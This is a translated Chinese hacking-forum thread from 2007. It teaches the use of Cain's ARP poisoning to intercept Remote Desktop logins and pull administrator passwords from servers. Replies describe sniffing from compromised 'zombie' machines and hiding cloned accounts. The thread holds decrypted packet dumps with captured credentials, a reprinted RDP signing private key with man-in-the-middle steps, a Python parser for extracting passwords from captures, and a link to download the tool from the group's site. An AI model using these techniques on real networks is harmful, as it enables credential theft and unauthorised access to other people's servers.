[Original] Sniffing 3389 passwords
Source: Evil Octal Information Security Team ([url]www.eviloctal.com[/url]) Author: 凋凌玫瑰 [N.C.P.H]
ARP spoofing plus sniffing is nothing new to anyone who plays at hacking. The most common use is sniffing FTP passwords on the same network segment, so people like the main site they are penetrating to have FTP open. But far more often the main site is more likely to have 3389 open than FTP, so being able to sniff 3389 directly would be even better.
Cain is a tool everyone knows: it does ARP spoofing plus sniffing and password cracking. Here is a download link for the latest version: [url]http://www.ncph.net/cain.exe[/url]. I won't go into its usage in detail; I'm sure everyone can use it. Cain actually ships with a feature for sniffing Terminal Services (3389) passwords, but I hadn't heard of anyone using it, and I hadn't used it before either. Then once, while sniffing, I happened to have the 3389 sniffing enabled; nothing else was sniffed, but it captured an RDP entry, and when I opened and analysed it, the 3389 password was right there.
Many people who read the site penetration write-up on my blog asked me how I sniffed the 3389 password, so I decided to write it up and share it. Please credit the source if you repost.
Here is an illustrated tutorial. First install cain.exe; the default installation is fine.
1. Open the Sniffer tab:
[attach]5418[/attach]
2. Open the port configuration and set it to sniff port 3389:
[attach]5415[/attach]
3. Click Start Sniffer and right-click to scan MAC addresses:
[attach]5416[/attach]
4. Open the ARP tab and click the "+" button to open the poisoning settings:
[attach]5419[/attach]
5. Select the gateway on the left and the IP to spoof on the right:
[attach]5420[/attach]
6. Click the poison button to start spoofing:
[attach]5417[/attach]
7. One spoofed entry shows up:
[attach]5421[/attach]
8. Select APR-RDP and right-click the data in the right-hand pane:
[attach]5422[/attach]
9. The file the right-click opens:
[attach]5423[/attach]
10. Find the administrator's 3389 login username and password in the file:
[attach]5424[/attach]
The above was tested on both the Internet and a LAN and reliably grabs the administrator password, but only after the administrator has logged in successfully. Cain uses ARP spoofing to intercept the data packets in transit and can break the 3389 encryption protocol. Nice piece of software.

[quote][b]Quoting post #2 by [i]xiaozei[/i], posted [i]2007-02-05 07:51[/i][/b]:
Now go analyse sniffing QQ....[/quote]
Apart from UDP, QQ seems to talk over its own protocol; even if you sniff it you can't decrypt it..

No way, it can grab 3389 passwords and decrypt them?
Oh my god, I sniffed loads of these before and threw them all away

Damn, never paid attention before; it was over on the right all along .A.d.m.i.n..........

Big brother NCPH, truly impressive!
But last time I visited your site, Kaspersky raised a security alert……
No idea why!?
Learned something, many thanks!

TO: Apart from UDP, QQ seems to talk over its own protocol; even if you sniff it you can't decrypt it..
I remember seeing a tutorial somewhere on sniffing QQ passwords, though the principle seemed to be a QQ vulnerability. It should have been patched by now```but there are probably still experts who can. Right?

You mean my blog? It calls some JS, so Kaspersky gives a false positive.

Noticed this feature long ago, but thinking about it isn't the same as doing it
Few people sniff 3389

[quote][b]Quoting post #5 by [i]凋凌玫瑰[/i], posted [i]2007-02-05 14:20[/i][/b]:
You mean my blog? It calls some JS, so Kaspersky gives a false positive.[/quote]
Hehe``makes sense.
But I'm browsing from the office, so I can't afford any slip-ups.
Besides, you're an expert and I'm a newbie```better safe than sorry, right? Hehe

Went through all the RDP files on a zombie box
and found nothing after the usernames; no passwords

If I sniff with it on a zombie box, will the zombie drop offline?

[Client decrypted packet] - 347 bytes total; 320 bytes decrypted
0000 03 00 01 5b 02 f0 80 64 00 06 03 eb 70 81 4c 48 ...[...d....p.LH
0010 00 00 00 41 64 62 41 5e 55 7e 26 04 04 04 04 b3 ...AdbA^U~&.....
0020 43 00 00 08 00 06 00 00 00 00 00 00 00 47 00 50 C............G.P
0030 00 53 00 32 00 00 00 72 00 61 00 79 00 00 00 00 .S.2...r.a.y....
0040 00 00 00 00 00 02 00 1a 00 31 00 39 00 32 00 2e .........1.9.2..
0050 00 31 00 36 00 38 00 2e 00 31 00 31 00 2e 00 32 .1.6.8...1.1...2
0060 00 00 00 40 00 43 00 3a 00 5c 00 57 00 49 00 4e ...@.C.:.\.W.I.N
0070 00 44 00 4f 00 57 00 53 00 5c 00 73 00 79 00 73 .D.O.W.S.\.s.y.s
0080 00 74 00 65 00 6d 00 33 00 32 00 5c 00 6d 00 73 .t.e.m.3.2.\.m.s
0090 00 74 00 73 00 63 00 61 00 78 00 2e 00 64 00 6c .t.s.c.a.x...d.l
00a0 00 6c 00 00 00 20 fe ff ff 2d 4e 0b 57 19 6a 96 .l... ...-N.W.j.
00b0 6e 42 66 93 95 00 00 00 00 00 00 00 00 00 00 00 nBf.............
The user is ray; why is the password ......????

Seems I'm in the same boat as post #15
No password. Only my own machine's IP

Strange; tried a second time on another subnet, this time a machine logged in as administrator, and the password came out

Worth looking into
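An added example from the editor (not Cain's code, and not posted by anyone in the thread): the "[Client decrypted packet]" dumps quoted in this thread are the Client Info PDU (TS_INFO_PACKET, MS-RDPBCGR 2.2.1.11) with Cain's RC4 layer already removed, and whether a password shows up is decided by two fields inside it, the INFO_AUTOLOGON bit of flags and cbPassword. The parser below reads those fields out of a pasted dump instead of eyeballing the ASCII column. It assumes Cain's dump layout (offset, up to 16 hex bytes, ASCII column) and uses as its built-in sample the administrator capture posted further down the thread, the one in which asdf1234 appeared.

```python
"""Decode the Client Info PDU (TS_INFO_PACKET, MS-RDPBCGR 2.2.1.11) inside a Cain
"[Client decrypted packet]" dump, so the flag and length fields can be read instead of
being guessed from the ASCII column."""
import re
import struct

SEC_ENCRYPT = 0x0008         # TS_SECURITY_HEADER.flags: an 8-byte MAC follows the header
SEC_INFO_PKT = 0x0040        # TS_SECURITY_HEADER.flags: the payload is a Client Info PDU
INFO_AUTOLOGON = 0x00000008  # TS_INFO_PACKET.flags: client asks the server to log on automatically
INFO_UNICODE = 0x00000010    # TS_INFO_PACKET.flags: the five string fields are UTF-16LE
FIELDS = ("domain", "user", "password", "alt_shell", "work_dir")

# Sample input: the "administrator / asdf1234" capture posted later in this thread (first 13 rows).
ADMIN_DUMP = r"""
0000 03 00 01 77 02 f0 80 64 00 06 03 eb 70 81 68 48 ...w...d....p.hH
0010 00 00 00 3f 47 11 df d2 b4 5a 85 04 04 04 04 bb ...?G....Z......
0020 43 00 00 00 00 1a 00 10 00 00 00 00 00 00 00 61 C..............a
0030 00 64 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 .d.m.i.n.i.s.t.r
0040 00 61 00 74 00 6f 00 72 00 00 00 61 00 73 00 64 .a.t.o.r...a.s.d
0050 00 66 00 31 00 32 00 33 00 34 00 00 00 00 00 00 .f.1.2.3.4......
0060 00 02 00 1a 00 31 00 39 00 32 00 2e 00 31 00 36 .....1.9.2...1.6
0070 00 38 00 2e 00 31 00 31 00 2e 00 32 00 00 00 40 .8...1.1...2...@
0080 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 00 4f .C.:.\.W.I.N.D.O
0090 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 00 65 .W.S.\.s.y.s.t.e
00a0 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 00 73 .m.3.2.\.m.s.t.s
00b0 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c 00 00 .c.a.x...d.l.l..
00c0 00 20 fe ff ff 2d 4e 0b 57 19 6a 96 6e 42 66 93 . ...-N.W.j.nBf.
"""


def hexdump_to_bytes(dump):
    """Rebuild raw bytes from Cain's 'offset  hex bytes  ascii' lines; other lines are ignored."""
    raw = bytearray()
    for line in dump.splitlines():
        m = re.match(r"\s*[0-9a-fA-F]{4}\s+((?:[0-9a-fA-F]{2}(?:\s+|$)){1,16})", line)
        if m:
            raw += bytes.fromhex(m.group(1))
    return bytes(raw)


def _ucs(pkt, off, n):
    """UTF-16LE string of n bytes at off (NUL included in n), or None if the dump was cut short."""
    if off + n > len(pkt):
        return None
    return pkt[off:off + n].decode("utf-16le").rstrip("\x00")


def parse_client_info(pkt):
    """Walk TPKT -> X.224 data TPDU -> MCS SendDataRequest -> security header -> TS_INFO_PACKET."""
    if pkt[0] != 0x03 or pkt[4:7] != b"\x02\xf0\x80" or pkt[7] != 0x64:
        raise ValueError("not a TPKT/X.224/MCS SendDataRequest PDU")
    off = 13                                  # past 0x64, initiator(2), channelId(2), dataPriority(1)
    off += 2 if pkt[off] & 0x80 else 1        # PER length determinant: 2 bytes when bit 7 is set
    sec_flags = struct.unpack_from("<H", pkt, off)[0]
    off += 4                                  # flags(2) + flagsHi(2)
    if not sec_flags & SEC_INFO_PKT:
        raise ValueError("security header flags 0x%04x: not a Client Info PDU" % sec_flags)
    if sec_flags & SEC_ENCRYPT:
        off += 8                              # dataSignature; Cain already stripped the RC4 layer behind it
    code_page, flags = struct.unpack_from("<II", pkt, off)
    off += 8
    sizes = struct.unpack_from("<HHHHH", pkt, off)  # cbDomain..cbWorkingDir, NUL terminators not counted
    off += 10
    enc, nul = ("utf-16le", 2) if flags & INFO_UNICODE else ("latin-1", 1)
    info = {"code_page": code_page, "flags": flags, "autologon": bool(flags & INFO_AUTOLOGON),
            "cb": dict(zip(FIELDS, sizes))}
    for name, size in zip(FIELDS, sizes):
        field = pkt[off:off + size]
        off += size + nul
        try:
            text = field.decode(enc)
        except UnicodeDecodeError:
            text = None
        # a field that is not printable text (e.g. a 512-byte password blob) is reported as a blob
        info[name] = text if text is not None and text.isprintable() else "<%d-byte blob>" % size
    # TS_EXTENDED_INFO_PACKET: address family, then client address and client directory,
    # both always UTF-16LE with their cb including the NUL; dumps are often cut short here
    if off + 4 <= len(pkt):
        _family, cb_addr = struct.unpack_from("<HH", pkt, off)
        off += 4
        info["client_address"] = _ucs(pkt, off, cb_addr)
        off += cb_addr
    if off + 2 <= len(pkt):
        cb_dir = struct.unpack_from("<H", pkt, off)[0]
        info["client_dir"] = _ucs(pkt, off + 2, cb_dir)
    return info


def describe(info):
    """One-line summary: who logged in, whether a password travelled, and why (the flags)."""
    return "user=%r domain=%r password=%r autologon=%s flags=0x%08x cbPassword=%d client=%s" % (
        info["user"], info["domain"], info["password"], info["autologon"], info["flags"],
        info["cb"]["password"], info.get("client_address"))


if __name__ == "__main__":
    print(describe(parse_client_info(hexdump_to_bytes(ADMIN_DUMP))))
```

On the ray capture above the same function reports flags 0x43b3 (INFO_AUTOLOGON clear) with cbPassword 0, and on the administrator capture 0x43bb with cbPassword 16: in these captures the plaintext password is in this PDU exactly when the client is performing an automatic logon with credentials already filled in, which is the conclusion the thread reaches later. The 919-byte capture near the end of the thread has the flag clear and a 512-byte cbPassword that is not text; the parser reports that as a blob rather than as a password.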
Seems only the newer version of Cain has this
Apart from WinPcap, this thing is portable :)
I once tried sniffing VoIP with it; didn't seem to work very well.

I tested it; the results are as follows
1. Logging in as ray: no password found
[Client decrypted packet] - 357 bytes total; 330 bytes decrypted
0000 03 00 01 65 02 f0 80 64 00 06 03 eb 70 81 56 48 ...e...d....p.VH
0010 00 00 00 6d 1d 5d 6d 6d 65 09 a3 04 04 04 04 b3 ...m.]mme.......
0020 43 00 00 12 00 06 00 00 00 00 00 00 00 53 00 54 C............S.T
0030 00 52 00 45 00 41 00 4d 00 49 00 4e 00 47 00 00 .R.E.A.M.I.N.G..
0040 00 72 00 61 00 79 00 00 00 00 00 00 00 00 00 02 .r.a.y..........
0050 00 1a 00 31 00 39 00 32 00 2e 00 31 00 36 00 38 ...1.9.2...1.6.8
0060 00 2e 00 31 00 31 00 2e 00 32 00 00 00 40 00 43 ...1.1...2...@.C
0070 00 3a 00 5c 00 57 00 49 00 4e 00 44 00 4f 00 57 .:.\.W.I.N.D.O.W
0080 00 53 00 5c 00 73 00 79 00 73 00 74 00 65 00 6d .S.\.s.y.s.t.e.m
0090 00 33 00 32 00 5c 00 6d 00 73 00 74 00 73 00 63 .3.2.\.m.s.t.s.c
00a0 00 61 00 78 00 2e 00 64 00 6c 00 6c 00 00 00 20 .a.x...d.l.l...
00b0 fe ff ff 2d 4e 0b 57 19 6a 96 6e 42 66 93 95 00 ...-N.W.j.nBf...
00c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2. Logging in as administrator: password found (asdf1234)
[Client decrypted packet] - 375 bytes total; 348 bytes decrypted
0000 03 00 01 77 02 f0 80 64 00 06 03 eb 70 81 68 48 ...w...d....p.hH
0010 00 00 00 3f 47 11 df d2 b4 5a 85 04 04 04 04 bb ...?G....Z......
0020 43 00 00 00 00 1a 00 10 00 00 00 00 00 00 00 61 C..............a
0030 00 64 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 .d.m.i.n.i.s.t.r
0040 00 61 00 74 00 6f 00 72 00 00 00 61 00 73 00 64 .a.t.o.r...a.s.d
0050 00 66 00 31 00 32 00 33 00 34 00 00 00 00 00 00 .f.1.2.3.4......
0060 00 02 00 1a 00 31 00 39 00 32 00 2e 00 31 00 36 .....1.9.2...1.6
0070 00 38 00 2e 00 31 00 31 00 2e 00 32 00 00 00 40 .8...1.1...2...@
0080 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 00 4f .C.:.\.W.I.N.D.O
0090 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 00 65 .W.S.\.s.y.s.t.e
00a0 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 00 73 .m.3.2.\.m.s.t.s
00b0 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c 00 00 .c.a.x...d.l.l..
00c0 00 20 fe ff ff 2d 4e 0b 57 19 6a 96 6e 42 66 93 . ...-N.W.j.nBf.
00d0 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3. Logging in as a guest with elevated privileges: no password found
[Client decrypted packet] - 359 bytes total; 332 bytes decrypted
0000 03 00 01 67 02 f0 80 64 00 06 03 eb 70 81 58 48 ...g...d....p.XH
0010 00 00 00 0a 58 35 a1 ea 85 55 84 04 04 04 04 b3 ....X5...U......
0020 43 00 00 00 00 1a 00 00 00 00 00 00 00 00 00 61 C..............a
0030 00 64 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 .d.m.i.n.i.s.t.r
0040 00 61 00 74 00 6f 00 72 00 00 00 00 00 00 00 00 .a.t.o.r........
0050 00 02 00 1a 00 31 00 39 00 32 00 2e 00 31 00 36 .....1.9.2...1.6
0060 00 38 00 2e 00 31 00 31 00 2e 00 32 00 00 00 40 .8...1.1...2...@
0070 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 00 4f .C.:.\.W.I.N.D.O
0080 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 00 65 .W.S.\.s.y.s.t.e
0090 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 00 73 .m.3.2.\.m.s.t.s
00a0 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c 00 00 .c.a.x...d.l.l..
00b0 00 20 fe ff ff 2d 4e 0b 57 19 6a 96 6e 42 66 93 . ...-N.W.j.nBf.
00c0 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Seems it can only sniff Administrator, nothing else.. hoping someone can explain

When I ARP-poisoned a Taiwanese 2003 box on 3389, Administrator logged in but I didn't get the password.
I suspect it wasn't the built-in Administrator account.
Nice testing by the brother at post #15, kudos.
玫瑰 also noted in the article: the administrator user has to log in successfully before you get the password.
There's another interesting phenomenon.
[img]http://www.ncph.net/newncph/edit/UploadFile/20072464647508.jpg[/img]
The c:\windows\system32 path at the end isn't the zombie's path; it's the client's.

Cain works well against 2003
For 2000, WinPcap still gives a higher success rate``

Haven't tested; after all, plenty of machines don't have Terminal Services on.
Also: 玫瑰, could you describe the exact steps of your account cloning? I've tested N machines, and whether I delete from cmd or from the user management UI, as long as the name carries a $ it shows up again in user management after a reboot.

It seems many machines don't necessarily log in as Administrator
or have renamed the account; wouldn't the odds be too low then?

Non-built-in account passwords can be sniffed too, and 玫瑰 got it wrong: earlier versions of Cain could sniff this just the same~ As for cases where nothing is sniffed, it may have to do with the encryption strength

Isn't the encryption strength the same everywhere? I honestly don't know of any algorithm where password encryption comes in different strengths. (I'm fairly ignorant.) On the same system every version has the same strength; across versions I don't know. Are you referring to RC4?
His locally saved file has a password 1329 characters long.
Maybe it got captured because of something the administrator did.
I suggest everyone read Cain's help file; I skimmed it and the description of this part is fairly detailed.
Pasting it here for anyone who wants to read it:
[code]
APR-RDP
APR-RDP enables the capture and the decryption of Remote Desktop Protocol (RDP) traffic between hosts. RDP is the protocol used to connect to Windows Terminal Services of a remote computer.
Microsoft's Windows Terminal Services (built into Windows 2000 Server and Windows Server 2003) and Windows XP's Remote Desktop, provide an easy, convenient way for administrators to implement thin computing within an organization or for users to connect to their XP desktops from a remote computer and run applications or access files.
A Windows 2000 terminal server can be installed in one of two modes: administrative or application server. In administrative mode, only users with administrative accounts can access the terminal server .... this is why these sessions are so interesting.
By default, data that travels between the terminal server and the terminal services client is protected by encryption. The protocol uses the RC4 symmetric encryption algorithm
at one of the following three levels:
High: encrypts both the data sent from client to server and the data sent from server to client using a 128-bit key.
Medium: encrypts both the data sent from client to server and the data sent from server to client using a 56-bit key if the client is a Windows 2000 or above client, or a 40-bit key if the client is an earlier version.
Low: encrypts only the data sent from client to server, using either a 56-bit or 40-bit key, depending on the client version.
RC4 encryption keys are generated after an initial key exchange in which RSA asymmetric encryption is used.
In April 2003 Erik Forsberg released a security advisory to the public ( [url]http://www.securityfocus.com/archive/1/317244[/url] ) explaining that:
"... During extensive investigation of the Remote Desktop Protocol (RDP), the protocol used to connect to Windows Terminal Services, we have found that although the information sent over the network is encrypted, there is no verification of the identity of the server when setting up the encryption keys for the session. This means RDP is vulnerable to Man In The Middle attacks (from here on referred to as MITM attacks). The attack works as follows:
1) The client connects to the server, however by some method (DNS spoofing, arp poisioning, etc.) we've fooled it to connect to the MITM instead. The MITM sends the request further to the server.
2) The server sends it's public key and a random salt, in cleartext, again through the MITM. The MITM sends the packet further to the client, but exchanges the public key to another one for which it knows the private part.
3) The client sends a random salt, encrypted with the server public key, to the MITM.
4) The MITM deencrypts the clients random salt with it's private key, encrypts it with the real servers public key and sends it to the server.
5) The MITM now know both the server and the client salt, which is enough information to construct the session keys used for further packets sent between the client and the server. All information sent between the parts can now be read in cleartext.
The vulnerability occurs because the clients by no means try to verify the public key of the server, sent in step 2 above. In other protocols, such as the Secure Shell protocol, most client implementations solve this for example by letting the user answer a question whether a specific serverkey fingerprint is valid. ..."
Microsoft confirmed the above problem and fixed the new versions of Remote Desktop Clients. Recent clients (mstsc.exe), including the one of version XPSP2 5.1.2600.2180, now check the Terminal Server identity verifying its public key. They solved the problem ? No, man-in-the-middle attacks are still possible and can be really invisible for users.
During the initial key-exchange phase, the terminal server sends to the client a server certificate created at the start up of Terminal Server services. This certificate is stored in the registry of the server under the following key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService\Parameters\Certificate
It contains an RSA public key and its digital signature as illustrated below:
The public key modulus (n) is the same as the one present in the RSA2 key stored in the LSA Secret "L$HYDRAENCKEY" (you can use the Cain's LSA Secret Dumper to check it) of the server; the signature is the information used by the client to verify the server identity.
From a man-in-the-middle attacker's point of view, the public key signature must be modified on the fly to trick the client into verifying the new Mitm public key that will be replaced into the network packet directed to the client. But … what is used to produce this signature ?
Well, a digital signature is noting more nothing less than a hash of something (in this case a server public key) encrypted using a private key and an asymmetric encryption algorithm. This is exactly what is done by the terminal server. At the client-side, this signature is decrypted using a public key and the result is compared with a new hash of the received server public key calculated by the client; if the two hashes match the identity of the server is proven.
Microsoft use another RSA private key to sign the Terminal Server public key and this private key is public ! It could sound strange but this is only the truth, the private key used for the signature creation is hard-coded into mstlsapi.dll and it is dynamically created, used and de-allocated into a subroutine of the "TLSInit" API. Every Windows user has this file ... is this a new kind of public-private key (PPK) ?!?
The Microsoft Windows Terminal Server PPK follows:
public exponent: e
0x5B,0x7B,0x88,0xC0
public modulus: n
0x3D,0x3A,0x5E,0xBD,0x72,0x43,0x3E,0xC9,0x4D,0xBB,0xC1,0x1E,0x4A,0xBA,0x5F,0xCB,
0x3E,0x88,0x20,0x87,0xEF,0xF5,0xC1,0xE2,0xD7,0xB7,0x6B,0x9A,0xF2,0x52,0x45,0x95,
0xCE,0x63,0x65,0x6B,0x58,0x3A,0xFE,0xEF,0x7C,0xE7,0xBF,0xFE,0x3D,0xF6,0x5C,0x7D,
0x6C,0x5E,0x06,0x09,0x1A,0xF5,0x61,0xBB,0x20,0x93,0x09,0x5F,0x05,0x6D,0xEA,0x87,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
private exponent: d
0x87,0xA7,0x19,0x32,0xDA,0x11,0x87,0x55,0x58,0x00,0x16,0x16,0x25,0x65,0x68,0xF8,
0x24,0x3E,0xE6,0xFA,0xE9,0x67,0x49,0x94,0xCF,0x92,0xCC,0x33,0x99,0xE8,0x08,0x60,
0x17,0x9A,0x12,0x9F,0x24,0xDD,0xB1,0x24,0x99,0xC7,0x3A,0xB8,0x0A,0x7B,0x0D,0xDD,
0x35,0x07,0x79,0x17,0x0B,0x51,0x9B,0xB3,0xC7,0x10,0x01,0x13,0xE7,0x3F,0xF3,0x5F,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
secret prime factor: p
0x3F,0xBD,0x29,0x20,0x57,0xD2,0x3B,0xF1,0x07,0xFA,0xDF,0xC1,0x16,0x31,0xE4,0x95,
0xEA,0xC1,0x2A,0x46,0x2B,0xAD,0x88,0x57,0x55,0xF0,0x57,0x58,0xC6,0x6F,0x95,0xEB,
0x00,0x00,0x00,0x00
secret prime factor: q
0x83,0xDD,0x9D,0xD0,0x03,0xB1,0x5A,0x9B,0x9E,0xB4,0x63,0x02,0x43,0x3E,0xDF,0xB0,
0x52,0x83,0x5F,0x6A,0x03,0xE7,0xD6,0x78,0x45,0x83,0x6A,0x5B,0xC4,0xCB,0xB1,0x93,
0x00,0x00,0x00,0x00
d mod (p-1): dmp1
0x65,0x9D,0x43,0xE8,0x48,0x17,0xCD,0x29,0x7E,0xB9,0x26,0x5C,0x79,0x66,0x58,0x61,
0x72,0x86,0x6A,0xA3,0x63,0xAD,0x63,0xB8,0xE1,0x80,0x4C,0x0F,0x36,0x7D,0xD9,0xA6,
0x00,0x00,0x00,0x00
d mod (q-1): dmq1
0x75,0x3F,0xEF,0x5A,0x01,0x5F,0xF6,0x0E,0xD7,0xCD,0x59,0x1C,0xC6,0xEC,0xDE,0xF3,
0x5A,0x03,0x09,0xFF,0xF5,0x23,0xCC,0x90,0x27,0x1D,0xAA,0x29,0x60,0xDE,0x05,0x6E,
0x00,0x00,0x00,0x00
q^-1 mod p: iqmp
0xC0,0x17,0x0E,0x57,0xF8,0x9E,0xD9,0x5C,0xF5,0xB9,0x3A,0xFC,0x0E,0xE2,0x33,0x27,
0x59,0x1D,0xD0,0x97,0x4A,0xB1,0xB1,0x1F,0xC3,0x37,0xD1,0xD6,0xE6,0x9B,0x35,0xAB,
0x00,0x00,0x00,0x00
The knowledge of the PPK key lets the attacker calculate a valid signature for the mitm public key generated on the fly during the mitm attack; the client will verify the mitm signature correctly and it will accept the session without informing the users that the server key is changed from the usual one.
The signature is calculated encrypting, with the private part of the PPK key, the MD5 hash of the server public key for a total of 108 bytes hashed.
How it works
0) The network packet from the server is hijacked and captured by mean of APR (ARP Poison Routing).
1) The server random and the real server public key are extracted from the packet and stored for future usage.
2) The server public key is replaced in the network packet with a new one generated by Cain (the mitm machine) during the key exchange phase.
3) The MD5 hash of the new mitm public key is calculated.
4) The hash is signed by Cain (encrypted using the private key) using the super secret Microsoft PPK illustrated above.
5) The mitm sign is replaced into the network packet.
6) The packet is routed by APR to the client.
7) The network packet from the client is hijacked and captured by mean of APR (ARP Poison Routing).
8) The client encrypted random is decrypted using the mitm private key.
9) The client random is encrypted using the real server public key and replaced into the network packet for the server.
10) The packet is routed by APR to the server.
11) RC4 symmetric encryption keys are calculated.
12) The key entropy is reduced accordingly with the encryption level used in the session.
13) Packets are decrypted and saved locally to text files.
Authentication
Cain also try to recognize the keyboard activity at the client-side. This provide some kind of password interception.
Prerequisites
This feature needs APR to be enabled and a Man-in-the-Middle condition between the Terminal Server and the victim host.
[/code]
A tip for those interested: on 2003 machines where the administrator saved the password, testing shows it can be sniffed; 猪三 discovered this. I suspect it has something to do with Cain's local terminal password cracking, but I haven't looked into it, so I won't say more.

[quote][b]Quoting post #21 by [i]好菜[/i], posted [i]2007-02-07 12:34[/i][/b]:
Haven't tested; after all, plenty of machines don't have Terminal Services on.
Also: 玫瑰, could you describe the exact steps of your account cloning? I've tested N machines, and whether I delete from cmd or from the user management UI, as long as the name carries a $ it shows up again in user management after a reboot.[/quote]
1. Same question; I'd really like to know this too
2. The no-Terminal-Services case is rather nasty... though given how hostile server-room environments are, nobody usually touches a server physically; do they manage it with pcAnywhere? How would you sniff that...

[quote][b]Quoting post #10 by [i]raydan[/i], posted [i]2007-02-05 19:58[/i][/b]:
If I sniff with it on a zombie box, will the zombie drop offline?[/quote]
That depends on the ARP spoofing. When the spoofing succeeds, both the target and the gateway are poisoned and you relay the traffic, so nothing drops offline. But if either of the two fails to be poisoned, the target drops offline. What you'll see on your side is that Cain's ARP tab shows everything as "half-routing".
If poisoning the target fails, its outgoing data goes straight to the gateway, but the gateway sends the replies to you, so the target loses its connection. If poisoning the gateway fails, the data passes through you to the gateway fine and the gateway sends the replies to the target, but the target doesn't recognise them and drops them, because it takes you for the gateway.
In the latter case you can still sniff the password, but you'll find a lot of duplicated data in the capture. Why? Picture that guy typing his password again and again without ever getting logged in... Since the data reaches your machine, you get what you wanted.
As for why the poisoning sometimes fails: AntiARPSniffer may be installed, or it may be down to the gateway configuration

Does sniffing work over the Internet? Entering an Internet IP in the IP field doesn't work

Could it depend on the OS of the sniffing machine?
e.g. 2000 sniffing 2000, 2003 sniffing 2003?
Brothers with the right setup, please test, hehe~~

铞, it's really not that easy to sniff; it's only down to luck. Only XP and 2003 yield plaintext, and only when the administrator saved the TS connection as an .rdp file with the password saved, or logged in with the password saved on the console node; then you can sniff the password. The big "pig" (compromised) sites like to log in that way, e.g. wz16300.com with an absurdly complex password. If 3389 passwords could be sniffed at will, wouldn't that make you invincible? 铞.

The poster above is talking nonsense. It does seem possible to sniff passwords that weren't saved and have no RDP file; I tested it myself.

Hehe, 猪三 obviously hasn't tested this himself and is just repeating what he heard in the group. When I first caught a password I also wondered whether it was because the administrator had saved the password locally for automatic login, so I set up a dedicated environment to test, and it can indeed capture a manual login. I haven't read Cain's help file. As for those saying it only captures administrator's password: there are some things you need to research yourself instead of waiting for others to spell them out.... I'll leave it there.

[Client decrypted packet] - 361 bytes total; 334 bytes decrypted
0000 03 00 01 69 02 f0 80 64 00 06 03 eb 70 81 5a 48 ...i...d....p.ZH
0010 00 00 00 1d 07 e3 16 3a 87 b9 fe 04 08 04 08 b3 .......:........
0020 43 00 00 00 00 1a 00 00 00 00 00 00 00 00 00 41 C..............A
0030 00 64 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 .d.m.i.n.i.s.t.r
0040 00 61 00 74 00 6f 00 72 00 00 00 00 00 00 00 00 .a.t.o.r........
0050 00 02 00 1c 00 36 00 30 00 2e 00 31 00 36 00 34 .....6.0...1.6.4
0060 00 2e 00 33 00 30 00 2e 00 32 00 31 00 32 00 00 ...3.0...2.1.2..
0070 00 40 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 .@.C.:.\.W.I.N.D
0080 00 4f 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 .O.W.S.\.s.y.s.t
0090 00 65 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 .e.m.3.2.\.m.s.t
00a0 00 73 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c .s.c.a.x...d.l.l
00b0 00 00 00 20 fe ff ff 2d 4e fd 56 07 68 c6 51 f6 ... ...-N.V.h.Q.
============================================================
Tried a few; none gave a plaintext password. Zombie is 2003, target 2000.

Sometimes it hangs, and the box dies after 5 minutes (sniffing 3389 only)

So far my tests can only confirm that 猪三's experience is correct
Environment: two 2003 Servers under the same switch. I installed Cain 4.2 (downloaded from 玫瑰's link) on one of them and configured the sniffer for Terminal/RDP. (I changed the port; it isn't the default 3389, but I don't think that affects the result.)
I noticed the following:
With ARP poisoning on, [color=red]as soon as I connected to the target with the 3389 client (before entering a password), Cain's RDP sniffer already showed captured data[/color]. I then entered the correct account and password and logged in successfully, and afterwards looked at the captured data again. Where the username normally appears was the username already stored in my terminal client, not the one I actually logged in with, and there was no password after it. Then I searched the data. Going by the pattern usernames appear in, n.a.m.e style, I did a full-text search, and I could find the username I actually logged in with, but still no password. (Passwords would appear in the same p.a.s.s pattern.)
Next I did two more tests:
Logging in with a non-administrator user from the administrators group
1. Password not saved in the client: sniffing result, no password obtained
2. Password saved in the client: sniffing result, plaintext password obtained
Does 玫瑰 have some other secret technique? Please enlighten us!

Looks like it only works when the password is saved on the client
So it comes down to luck

I did sniff the password, but why is the account still administrator when clearly a different user logged in.

[quote][b]Quoting post #36 by [i]唐不狐[/i], posted [i]2007-02-11 20:09[/i][/b]:
So far my tests can only confirm that 猪三's experience is correct
Environment: two 2003 Servers under the same switch. I installed Cain 4.2 (downloaded from 玫瑰's link) on one of them and configured the sniffer for Terminal/RDP. (I changed the port; it isn't the default 3389, but I don't think that affects the result.)
I noticed the following:
